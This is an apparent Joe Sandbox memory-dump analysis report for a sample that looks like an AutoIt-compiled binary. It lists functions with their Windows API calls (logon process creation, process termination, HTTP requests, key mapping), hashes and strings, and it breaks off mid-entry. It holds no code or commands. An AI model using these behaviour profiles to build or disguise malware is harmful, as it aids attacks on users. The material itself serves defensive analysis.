Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 913fffaad12f01926d640f3ae05091933d94ecd09b189b94e927bdff5b8c58ae
Instruction ID: 4b7e8857ce6132637f22573cf370121f4aca548a2f40784677d22116e2256641
Opcode Fuzzy Hash: 913fffaad12f01926d640f3ae05091933d94ecd09b189b94e927bdff5b8c58ae
Instruction Fuzzy Hash: D811CD32901604FFDB108B65CF08FBE7BADEF8031AF10412DE846A3251CB329905CB60

Function 00EC8AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00EC8B2A
OpenProcessToken.ADVAPI32(00000000), ref: 00EC8B31
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00EC8B40
CloseHandle.KERNEL32(00000004), ref: 00EC8B4B
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00EC8B7A
DestroyEnvironmentBlock.USERENV(00000000), ref: 00EC8B8E

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 2d6618a4e566e26f35b2327737c2cba1baa138e3316670956a1436c4a94e2195
Instruction ID: 01550aa2a3868cca9d9e9e275c9c133d23b7df490a5b472cddf11dd1316ed857
Opcode Fuzzy Hash: 2d6618a4e566e26f35b2327737c2cba1baa138e3316670956a1436c4a94e2195
Instruction Fuzzy Hash: F0115CB6501209AFDF018FA5DE49FEA7BA9EF48308F045069FE04B2160C7729D65DB60

Function 00EFC19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00E712F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E7134D
Part of subcall function 00E712F3: SelectObject.GDI32(?,00000000), ref: 00E7135C
Part of subcall function 00E712F3: BeginPath.GDI32(?), ref: 00E71373
Part of subcall function 00E712F3: SelectObject.GDI32(?,00000000), ref: 00E7139C

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00EFC1C4
LineTo.GDI32(00000000,00000003,?), ref: 00EFC1D8
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00EFC1E6
LineTo.GDI32(00000000,00000000,?), ref: 00EFC1F6
EndPath.GDI32(00000000), ref: 00EFC206
StrokePath.GDI32(00000000), ref: 00EFC216

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 86ec6051efcd3ab564fd734f462a8fa8ba460e73fe1d60b0d4fa54656fcf6f26
Instruction ID: 44b688d13b20a6b446358b9b66ac988828615a5e341820b719ad4a70e12fef54
Opcode Fuzzy Hash: 86ec6051efcd3ab564fd734f462a8fa8ba460e73fe1d60b0d4fa54656fcf6f26
Instruction Fuzzy Hash: 9B111E7640014CBFEF119F95DC88EAA7FADEF08354F148021FA1896171C7719D59DBA0

Function 00E903A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E903D3
MapVirtualKeyW.USER32(00000010,00000000), ref: 00E903DB
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E903E6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E903F1
MapVirtualKeyW.USER32(00000011,00000000), ref: 00E903F9
MapVirtualKeyW.USER32(00000012,00000000), ref: 00E90401

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: d7faefcf82d3c4e8fac2094a321488d2cedb56e81882856c536745781cdedf33
Instruction ID: 4c69ff03713e93cd0a3626b6e629d664384f0ef561bd4e1738ead46a11ce0ad0
Opcode Fuzzy Hash: d7faefcf82d3c4e8fac2094a321488d2cedb56e81882856c536745781cdedf33
Instruction Fuzzy Hash: CF016CB09017597DE3008F5A8C85B52FFA8FF59354F00411BE15C87941C7F5A868CBE5

Function 00ED568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00ED569B
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00ED56B1
GetWindowThreadProcessId.USER32(?,?), ref: 00ED56C0
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00ED56CF
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00ED56D9
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00ED56E0

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: eb4834b874bf09661cd9ccc038021cc0a49dfb130c57c09eb853c431201c7912
Instruction ID: c8a83844d3149217fa10289ecfd537514fcd0f1d4e4590729898e6d8914860ba
Opcode Fuzzy Hash: eb4834b874bf09661cd9ccc038021cc0a49dfb130c57c09eb853c431201c7912
Instruction Fuzzy Hash: 8DF06D32241118BFE3205BA39C0DEFF7A7CEFC6B11F000169FA04E11519AA05A05C6B5

Function 00ED74D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00ED74E5
EnterCriticalSection.KERNEL32(?,?,00E81044,?,?), ref: 00ED74F6
TerminateThread.KERNEL32(00000000,000001F6,?,00E81044,?,?), ref: 00ED7503
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00E81044,?,?), ref: 00ED7510

Part of subcall function 00ED6ED7: CloseHandle.KERNEL32(00000000,?,00ED751D,?,00E81044,?,?), ref: 00ED6EE1

InterlockedExchange.KERNEL32(?,000001F6), ref: 00ED7523
LeaveCriticalSection.KERNEL32(?,?,00E81044,?,?), ref: 00ED752A

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 587d0d76b686b268b3de61b4b6302b655e69fd65ad9ed051d57a377db5c10c29
Instruction ID: c73b3d7ca5aeeff471cbbb411a727af1e29398c169fcdfd7455e0ca3a0dab404
Opcode Fuzzy Hash: 587d0d76b686b268b3de61b4b6302b655e69fd65ad9ed051d57a377db5c10c29
Instruction Fuzzy Hash: 43F05E3A540612EFEB111B65FC8C9FB7B2AEF85302B401532F602B11B1DB755906CB50

Function 00EC8E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00EC8E7F
UnloadUserProfile.USERENV(?,?), ref: 00EC8E8B
CloseHandle.KERNEL32(?), ref: 00EC8E94
CloseHandle.KERNEL32(?), ref: 00EC8E9C
GetProcessHeap.KERNEL32(00000000,?), ref: 00EC8EA5
HeapFree.KERNEL32(00000000), ref: 00EC8EAC

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 7f25f09363862a0a528cfbc553dbbd763c7b18fbac58d785313f70516199c14b
Instruction ID: 5f6692e81d5d25afdd62524bd14063b5a6238b9034e4ab285ee684a5dc4a5087
Opcode Fuzzy Hash: 7f25f09363862a0a528cfbc553dbbd763c7b18fbac58d785313f70516199c14b
Instruction Fuzzy Hash: 47E0C237005002FFDA012FE2EC0C92ABF69FFC9322B548231F219A10B1CB329428DB50

Function 00EE8902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00EE8928
CharUpperBuffW.USER32(?,?), ref: 00EE8A37
VariantClear.OLEAUT32(?), ref: 00EE8BAF

Part of subcall function 00ED7804: VariantInit.OLEAUT32(00000000), ref: 00ED7844
Part of subcall function 00ED7804: VariantCopy.OLEAUT32(00000000,?), ref: 00ED784D
Part of subcall function 00ED7804: VariantClear.OLEAUT32(00000000), ref: 00ED7859

Strings

AUTOIT.ERROR, xrefs: 00EE8A3D
Incorrect Parameter format, xrefs: 00EE8960, 00EE8B22

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: c03e1a45c0adb4e8827dce1a089d3666b0fb4a15a899e5f915d642bd597ff5b0
Instruction ID: 17894da0a46245f810098a216296188bbe5454fc67b73166b03604901a7ab1be
Opcode Fuzzy Hash: c03e1a45c0adb4e8827dce1a089d3666b0fb4a15a899e5f915d642bd597ff5b0
Instruction Fuzzy Hash: 3691BC75A083459FC700DF25C58096ABBE4EFC8314F04996EF89EAB362DB31E905CB52

Function 00ED2F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E8FEC6: _wcscpy.LIBCMT ref: 00E8FEE9

_memset.LIBCMT ref: 00ED3077
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00ED30A6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00ED3159
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00ED3187

Strings

0, xrefs: 00ED3063

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 32d4e3b56862e702530fd202a7b73ae27d59d73dd9710d910ce63fad1a9c2c9e
Instruction ID: 757aa4cd8e633f7a21de937452b022a4e022a263167b7cbad0e0bcb8ba06badc
Opcode Fuzzy Hash: 32d4e3b56862e702530fd202a7b73ae27d59d73dd9710d910ce63fad1a9c2c9e
Instruction Fuzzy Hash: C151D031609302AED7259F38C845A6BB7E4EF45364F046A2EF895F3291DB70CE468763

Function 00ECDA5D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00ECDAC5
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00ECDAFB
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00ECDB0C
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00ECDB8E

Strings

DllGetClassObject, xrefs: 00ECDB01

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 89fad5c9bcfe49b3a1fa1c385411d9df5d6a86eab376b4066a1f0dd3eb991d30
Instruction ID: 46af4e634bb86ddc7dfc1ba597ead8d23c08a45799fd219c2c3649885152bddb
Opcode Fuzzy Hash: 89fad5c9bcfe49b3a1fa1c385411d9df5d6a86eab376b4066a1f0dd3eb991d30
Instruction Fuzzy Hash: 86418DB1604208DFDB04CF15CD84F9ABBB9EF44310F1590AEA905AF206D7B2DD45DBA0

Function 00ED2C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00ED2CAF
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00ED2CCB
DeleteMenu.USER32(?,00000007,00000000), ref: 00ED2D11
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00F36890,00000000), ref: 00ED2D5A

Strings

0, xrefs: 00ED2CA4

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 1707bec59df465a4de149f9556020aa4359b569b82759f3658fa96a121555c16
Instruction ID: 3d9588f82736e1337a998ef05e300af70c90738085b798eb39ab5d3536243e63
Opcode Fuzzy Hash: 1707bec59df465a4de149f9556020aa4359b569b82759f3658fa96a121555c16
Instruction Fuzzy Hash: 4D41A0302043019FD724DF24C844B5ABBE9EFD5324F14565EFA65AB391D770E906CB92

Function 00EEDAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00EEDAD9

Part of subcall function 00E779AB: _memmove.LIBCMT ref: 00E779F9

Strings

stdcall, xrefs: 00EEDB5B
none, xrefs: 00EEDBB4
cdecl, xrefs: 00EEDB30
winapi, xrefs: 00EEDB4A

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 0442d7a15c68bc48f6dfd158354435d5903702cef207ec1620cd0b4b82be1fe0
Instruction ID: f844adc26d13edb117d6cd6b25ae84f7768fcf80bf876e8cc0c4d7d0433459d4
Opcode Fuzzy Hash: 0442d7a15c68bc48f6dfd158354435d5903702cef207ec1620cd0b4b82be1fe0
Instruction Fuzzy Hash: F531A471504619AFCF10EF55CC819EEB3F4FF05314B11962AE869B76D1DB71A905CB80

Function 00EC9372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82

Part of subcall function 00ECB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00ECB0E7

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00EC93F6
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00EC9409
SendMessageW.USER32(?,00000189,?,00000000), ref: 00EC9439

Part of subcall function 00E77D2C: _memmove.LIBCMT ref: 00E77D66

Strings

ListBox, xrefs: 00EC93B5
ComboBox, xrefs: 00EC9380

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: 1dcfe1b5a98086b97fc6427653079af8890405b8e7af7f766e8b3473b4c6a5c6
Instruction ID: e1232e528ab20294ac912f9efb6be6702055cb9af18dacfd20e8cdd51868173f
Opcode Fuzzy Hash: 1dcfe1b5a98086b97fc6427653079af8890405b8e7af7f766e8b3473b4c6a5c6
Instruction Fuzzy Hash: 25210671A00104AEDB18AB74DC8ADFFB7B8EF45350B10912DF925B71E1DB364A0BD610

Function 00EE1B21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EE1B40
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EE1B66
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00EE1B96
InternetCloseHandle.WININET(00000000), ref: 00EE1BDD

Part of subcall function 00EE2777: GetLastError.KERNEL32(?,?,00EE1B0B,00000000,00000000,00000001), ref: 00EE278C
Part of subcall function 00EE2777: SetEvent.KERNEL32(?,?,00EE1B0B,00000000,00000000,00000001), ref: 00EE27A1

Strings

, xrefs: 00EE1B87

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: f0527095ceb555ce324e15e2c289ee98fd6116379a4e9ba4aaccf0c49c87ccd4
Instruction ID: 8527993f1952f99be8d3949d5d97ea4dae7c53048d00e59d7b8124bd4812d6b9
Opcode Fuzzy Hash: f0527095ceb555ce324e15e2c289ee98fd6116379a4e9ba4aaccf0c49c87ccd4
Instruction Fuzzy Hash: A0219FB150024CBFEB119F629C85EBFB7ECEB89748F10516AF505B6240EB309D499771

Function 00EF6656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E71D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E71D73
Part of subcall function 00E71D35: GetStockObject.GDI32(00000011), ref: 00E71D87
Part of subcall function 00E71D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E71D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00EF66D0
LoadLibraryW.KERNEL32(?), ref: 00EF66D7
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00EF66EC
DestroyWindow.USER32(?), ref: 00EF66F4

Strings

SysAnimate32, xrefs: 00EF66AB

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: fa54d57b6013bcdf15b31d24022b3a3f70ea1c12b4999cf4d46929fee64c2565
Instruction ID: 2e2434f7fe9378bd962ddbb880cb08cafd21037ba5bc81826f5029dbd673cd9b
Opcode Fuzzy Hash: fa54d57b6013bcdf15b31d24022b3a3f70ea1c12b4999cf4d46929fee64c2565
Instruction Fuzzy Hash: 8D215B7120020ABFEF105F64EC80EBB77ADEF99368F116629FA11E6190DB71DC51A760

Function 00ED703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00ED705E
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00ED7091
GetStdHandle.KERNEL32(0000000C), ref: 00ED70A3
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00ED70DD

Strings

nul, xrefs: 00ED70D8

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: f50095a67ab2ef856260b56346d2be038577d7040f5b3a3843e3cfb3ea63f7cf
